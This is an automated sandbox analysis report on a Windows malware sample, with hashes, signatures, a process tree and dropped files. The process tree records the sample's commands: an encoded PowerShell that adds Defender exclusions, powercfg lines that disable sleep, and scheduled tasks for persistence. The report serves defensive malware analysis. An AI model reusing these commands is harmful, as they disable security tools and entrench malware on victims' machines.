Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    50s
  • max time network
    179s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    14/09/2022, 22:19

General

  • Target

    75220c700957c780cd35f7c30cbc8af8867902e97b850f487fab091a6b8226f6.exe

  • Size

    2.5MB

  • MD5

    57558ede05dc703f669117b413c41bff

  • SHA1

    d2395b980e87f8cae96f6aaa67e57202a3932c38

  • SHA256

    75220c700957c780cd35f7c30cbc8af8867902e97b850f487fab091a6b8226f6

  • SHA512

    c5eed69ffdf69cef434fc37b4b56ffe57f7023b3e444edc7d35b46041385297a6775f16c41289f22498b48dea937ec692156c072b6bd6927b447cbe9bab83b20

  • SSDEEP

    49152:yGwRpLlxzVu/GTuoZgdwb+bL6z2zzyIochMdjxkouiLMa8sU9A7BKHEf:yGwR1AGyoZgdTbtzzroUMksUcAkf

Score
8/10

Malware Config

Signatures

  • Downloads MZ/PE file
  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 7 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 30 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\75220c700957c780cd35f7c30cbc8af8867902e97b850f487fab091a6b8226f6.exe
    "C:\Users\Admin\AppData\Local\Temp\75220c700957c780cd35f7c30cbc8af8867902e97b850f487fab091a6b8226f6.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3828
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5116
      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        7z.exe e file.zip -p28212181714525110601836129965 -oextracted
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        PID:4084
      • C:\Users\Admin\AppData\Local\Temp\main\alex.exe
        "alex.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4520
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /C powershell -EncodedCommand "PAAjADMAMwBFAFYAZQBIADAAbgBUACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAQgBXAGgAOABLAFkAbQBtAEwAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMARwBzAFYAYgB1AHUAYQBmADAAQgBkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGUAdwBEAFIAVgBEAFIAWQBvADIAbQAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3924
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "PAAjADMAMwBFAFYAZQBIADAAbgBUACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAQgBXAGgAOABLAFkAbQBtAEwAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMARwBzAFYAYgB1AHUAYQBmADAAQgBkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGUAdwBEAFIAVgBEAFIAWQBvADIAbQAjAD4A"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4580
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4612" /TR "C:\ProgramData\Dllhost\dllhost.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:32
          • C:\Windows\SysWOW64\schtasks.exe
            SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk4612" /TR "C:\ProgramData\Dllhost\dllhost.exe"
            5⤵
            • Creates scheduled task(s)
            PID:344
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
          4⤵
            PID:3280
        • C:\Windows\system32\attrib.exe
          attrib +H "alex.exe"
          3⤵
          • Views/modifies file attributes
          PID:1268
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_1.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:3368
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_2.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:2992
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_3.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:4372
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_4.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:4556
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_5.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:3552
        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          7z.exe e extracted/file_6.zip -oextracted
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of AdjustPrivilegeToken
          PID:4644
        • C:\Windows\system32\mode.com
          mode 65,10
          3⤵
            PID:3936

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

        Filesize

        1.6MB

        MD5

        72491c7b87a7c2dd350b727444f13bb4

        SHA1

        1e9338d56db7ded386878eab7bb44b8934ab1bc7

        SHA256

        34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

        SHA512

        583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

        Filesize

        458KB

        MD5

        619f7135621b50fd1900ff24aade1524

        SHA1

        6c7ea8bbd435163ae3945cbef30ef6b9872a4591

        SHA256

        344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

        SHA512

        2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

        Filesize

        458KB

        MD5

        619f7135621b50fd1900ff24aade1524

        SHA1

        6c7ea8bbd435163ae3945cbef30ef6b9872a4591

        SHA256

        344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

        SHA512

        2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

        Filesize

        458KB

        MD5

        619f7135621b50fd1900ff24aade1524

        SHA1

        6c7ea8bbd435163ae3945cbef30ef6b9872a4591

        SHA256

        344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

        SHA512

        2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

        Filesize

        458KB

        MD5

        619f7135621b50fd1900ff24aade1524

        SHA1

        6c7ea8bbd435163ae3945cbef30ef6b9872a4591

        SHA256

        344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

        SHA512

        2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

        Filesize

        458KB

        MD5

        619f7135621b50fd1900ff24aade1524

        SHA1

        6c7ea8bbd435163ae3945cbef30ef6b9872a4591

        SHA256

        344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

        SHA512

        2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

        Filesize

        458KB

        MD5

        619f7135621b50fd1900ff24aade1524

        SHA1

        6c7ea8bbd435163ae3945cbef30ef6b9872a4591

        SHA256

        344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

        SHA512

        2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

        Filesize

        458KB

        MD5

        619f7135621b50fd1900ff24aade1524

        SHA1

        6c7ea8bbd435163ae3945cbef30ef6b9872a4591

        SHA256

        344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

        SHA512

        2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

      • C:\Users\Admin\AppData\Local\Temp\main\alex.exe

        Filesize

        21KB

        MD5

        cbd2a802e34a5467650dd732e5e21377

        SHA1

        b17ecde7faf42c6146ff5cbabce1ec71ede9caff

        SHA256

        0aeb02c7a288bf9987f400be557151ff19daf912f153cdf7ab679e813f116d9a

        SHA512

        f11425c8e5ecffb32a0fa70ae3415e2b8c50b93a96b0c4d2c443d4c9265eca396716308b76b0529c500aa8f5e7b4bc9957cac129b4cea199fd6a7a5ec6530cb5

      • C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

        Filesize

        2.1MB

        MD5

        9cc34b4afaeb90f7399b4e5532367f92

        SHA1

        bd2037168dc14e881cf7532b29efd2e828a7ef76

        SHA256

        9202f4434be105cfd9a85810b7b387d6a639e8380b9cc2db5bbfccdac1ab1bc5

        SHA512

        3c0b8e64cb05df66cac8f6c120aa1c6e302da9a8b03ddd397b3248c2307fb3e76aff01234a3a67c3fb167cb705b1f9f87ada442f104458208a5e8cd5bd522bfc

      • C:\Users\Admin\AppData\Local\Temp\main\extracted\alex.exe

        Filesize

        21KB

        MD5

        cbd2a802e34a5467650dd732e5e21377

        SHA1

        b17ecde7faf42c6146ff5cbabce1ec71ede9caff

        SHA256

        0aeb02c7a288bf9987f400be557151ff19daf912f153cdf7ab679e813f116d9a

        SHA512

        f11425c8e5ecffb32a0fa70ae3415e2b8c50b93a96b0c4d2c443d4c9265eca396716308b76b0529c500aa8f5e7b4bc9957cac129b4cea199fd6a7a5ec6530cb5

      • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

        Filesize

        9KB

        MD5

        2eabc967e66c565f03c711da5cfd7d8a

        SHA1

        abfbd38c3253583fb270a2cd33f0bd0461e2fdaf

        SHA256

        83e88dabcbc3e5d435afec31090a6a93060c2530e23e2aaf489f387e4d9df849

        SHA512

        c2dedddbb8cd5ee668b3e55f0f232b0dddc1a97caa90383cc6d5fafcc94ceafcad2c0b05eaf08ecc4094ff87507b98fae9d7c1ba8ff0732114a1c869ea218592

      • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

        Filesize

        9KB

        MD5

        103025d721083b6e96647537a32f324c

        SHA1

        352e421353ad0fc60a383dd13bdebe994c90dd87

        SHA256

        a6d096610ed0dd2441d469b46bc6530c76847393910c52bd54912f145b8c54e2

        SHA512

        4575334d516a3502685a2638d9b9e658d21de934da85105d3aa52ead62fb7082765362d35fddec2ac8e3104c2d9be0c9879274ca7b12b92c14b890b62ee1e414

      • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

        Filesize

        9KB

        MD5

        8836c2b6163cdb8436d89c46c3659ad0

        SHA1

        0cf1cc64e8cb3a38323b69b7ec5f03f91941c7bc

        SHA256

        097d44c585356f91252993fdd96aed5c7b2ff2403ad00a9ca7d44a0fea509e4c

        SHA512

        4134b885f659e4d4d17baad18c68c111a61b090d43a8d7ba1ce1c5e1949b7b66369250f07ed203474d1d7924f1a21ccfb948f44b3d7a11a1aef1d71b71df6c2c

      • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

        Filesize

        9KB

        MD5

        d2e218eafb0057822ddd2fba4d4e33de

        SHA1

        02a7c85aabe751e9adbf204fc3c23a2cec3e5304

        SHA256

        7e8579ed998348999448e08aee494e176752b9d7c8ebbeb3fc8b8ce0740af0ce

        SHA512

        fe0137502f8b057d0394610c55e25b5e490abbd951b6693dd3b8a8276dd5fa27e2102b8dc65b22cdf83f8704ae4bb42506c9d698fc098d9dcd0ce71fde4fdc5d

      • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

        Filesize

        10KB

        MD5

        a59e4eb4886d43cd1759f270045aea0a

        SHA1

        dc00f1e3a60e55326d60b6c5d15113ffe5cb01aa

        SHA256

        be91343a2da94bd756fa17a8b382bffbc8e6c53c1d1add8fbb9cbf999ce268f5

        SHA512

        e792066d8475fe4396e882325b75872fabad58c30952a9ae10561d42ec20acd84fbf12265ecbc723a12d4feb887a5cff7976935f7b844959747c6b5e358f9dd7

      • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

        Filesize

        1.5MB

        MD5

        c7931f8404e34185077c7ee1cf1d264d

        SHA1

        d388f217b92bf12e76fe33b62ae6c4c745f82d71

        SHA256

        c9fe94bd6703cc48e40c641db94ec2c22aecbd2586867daea6cc4f19048e56c4

        SHA512

        4b40584d9661795345dd578cfbbb3782504130e13d5c8160e344a6d3713a2476c49e257d1ab6bfd0436097ef6a73ef83634c0e730ebf1178a277c042a6c1cbb2

      • C:\Users\Admin\AppData\Local\Temp\main\file.bin

        Filesize

        1.5MB

        MD5

        94efe2b6efb68da045a6d4f89b6cb51e

        SHA1

        38559a3a60a440ab84555949b237f71e11afd0fd

        SHA256

        a59a8796b7236d4793245e8f44f51da2664f2ec208de79fcc3a5e4c665a51864

        SHA512

        014ab758c1249c862f64d185d3da833765177179359e386c9f4c17a02c0118e829fa538efcf56f7b8f31fd6e5e35a480b07099e6c6cba35f419ad158c43ed193

      • C:\Users\Admin\AppData\Local\Temp\main\main.bat

        Filesize

        450B

        MD5

        ff66a3d7b38116501a72bca822c5792b

        SHA1

        db6b9f7480c4820b3c89413b230d730cefb3828f

        SHA256

        b436f8182477005e4a193a99a90a2ae162dac2eb7f9efbe82fb6e5df24c794c0

        SHA512

        20a569ea86c701b432be35ca9f031e9b104443fe57c19f6590c41bef639ef5ef7a33b8c2f50f11c02d23e3cde4a0da6f22f612f7eb10b9c9023052c36d7f9cc9

      • \Users\Admin\AppData\Local\Temp\main\7z.dll

        Filesize

        1.6MB

        MD5

        72491c7b87a7c2dd350b727444f13bb4

        SHA1

        1e9338d56db7ded386878eab7bb44b8934ab1bc7

        SHA256

        34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

        SHA512

        583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

      • \Users\Admin\AppData\Local\Temp\main\7z.dll

        Filesize

        1.6MB

        MD5

        72491c7b87a7c2dd350b727444f13bb4

        SHA1

        1e9338d56db7ded386878eab7bb44b8934ab1bc7

        SHA256

        34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

        SHA512

        583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

      • \Users\Admin\AppData\Local\Temp\main\7z.dll

        Filesize

        1.6MB

        MD5

        72491c7b87a7c2dd350b727444f13bb4

        SHA1

        1e9338d56db7ded386878eab7bb44b8934ab1bc7

        SHA256

        34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

        SHA512

        583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

      • \Users\Admin\AppData\Local\Temp\main\7z.dll

        Filesize

        1.6MB

        MD5

        72491c7b87a7c2dd350b727444f13bb4

        SHA1

        1e9338d56db7ded386878eab7bb44b8934ab1bc7

        SHA256

        34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

        SHA512

        583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

      • \Users\Admin\AppData\Local\Temp\main\7z.dll

        Filesize

        1.6MB

        MD5

        72491c7b87a7c2dd350b727444f13bb4

        SHA1

        1e9338d56db7ded386878eab7bb44b8934ab1bc7

        SHA256

        34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

        SHA512

        583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

      • \Users\Admin\AppData\Local\Temp\main\7z.dll

        Filesize

        1.6MB

        MD5

        72491c7b87a7c2dd350b727444f13bb4

        SHA1

        1e9338d56db7ded386878eab7bb44b8934ab1bc7

        SHA256

        34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

        SHA512

        583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

      • \Users\Admin\AppData\Local\Temp\main\7z.dll

        Filesize

        1.6MB

        MD5

        72491c7b87a7c2dd350b727444f13bb4

        SHA1

        1e9338d56db7ded386878eab7bb44b8934ab1bc7

        SHA256

        34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

        SHA512

        583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

      • memory/3828-158-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-118-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-123-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-122-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-153-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-154-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-155-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-156-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-157-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-148-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-159-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-160-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-149-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-142-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-126-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-141-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-147-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-127-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-144-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-124-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-140-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-130-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-145-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-151-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-143-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-139-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-129-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-136-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-133-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-131-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-128-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-132-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-152-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-150-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-117-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-146-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-138-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-161-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-116-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-137-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-119-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-134-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-120-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-135-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-121-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/3828-125-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/4520-236-0x0000000005A50000-0x0000000005F4E000-memory.dmp

        Filesize

        5.0MB

      • memory/4520-204-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/4520-254-0x00000000057C0000-0x0000000005826000-memory.dmp

        Filesize

        408KB

      • memory/4520-210-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/4520-213-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/4520-214-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/4520-209-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/4520-215-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/4520-216-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/4520-208-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/4520-253-0x0000000005590000-0x000000000559A000-memory.dmp

        Filesize

        40KB

      • memory/4520-202-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/4520-200-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/4520-199-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/4520-201-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/4520-232-0x0000000000C10000-0x0000000000C1C000-memory.dmp

        Filesize

        48KB

      • memory/4520-206-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/4520-207-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/4520-203-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/4520-237-0x00000000055F0000-0x0000000005682000-memory.dmp

        Filesize

        584KB

      • memory/4520-211-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/4520-205-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/4520-212-0x0000000077440000-0x00000000775CE000-memory.dmp

        Filesize

        1.6MB

      • memory/4580-378-0x0000000008C20000-0x0000000008C53000-memory.dmp

        Filesize

        204KB

      • memory/4580-379-0x0000000008C00000-0x0000000008C1E000-memory.dmp

        Filesize

        120KB

      • memory/4580-330-0x0000000006C70000-0x0000000006CD6000-memory.dmp

        Filesize

        408KB

      • memory/4580-328-0x0000000006BD0000-0x0000000006BF2000-memory.dmp

        Filesize

        136KB

      • memory/4580-331-0x0000000007540000-0x0000000007890000-memory.dmp

        Filesize

        3.3MB

      • memory/4580-334-0x00000000074A0000-0x00000000074BC000-memory.dmp

        Filesize

        112KB

      • memory/4580-335-0x00000000079D0000-0x0000000007A1B000-memory.dmp

        Filesize

        300KB

      • memory/4580-339-0x0000000007C40000-0x0000000007CB6000-memory.dmp

        Filesize

        472KB

      • memory/4580-388-0x0000000008DA0000-0x0000000008E45000-memory.dmp

        Filesize

        660KB

      • memory/4580-310-0x0000000006D30000-0x0000000007358000-memory.dmp

        Filesize

        6.2MB

      • memory/4580-619-0x0000000008EE0000-0x0000000008EE8000-memory.dmp

        Filesize

        32KB

      • memory/4580-614-0x0000000008EF0000-0x0000000008F0A000-memory.dmp

        Filesize

        104KB

      • memory/4580-399-0x0000000008F50000-0x0000000008FE4000-memory.dmp

        Filesize

        592KB

      • memory/4580-305-0x00000000044C0000-0x00000000044F6000-memory.dmp

        Filesize

        216KB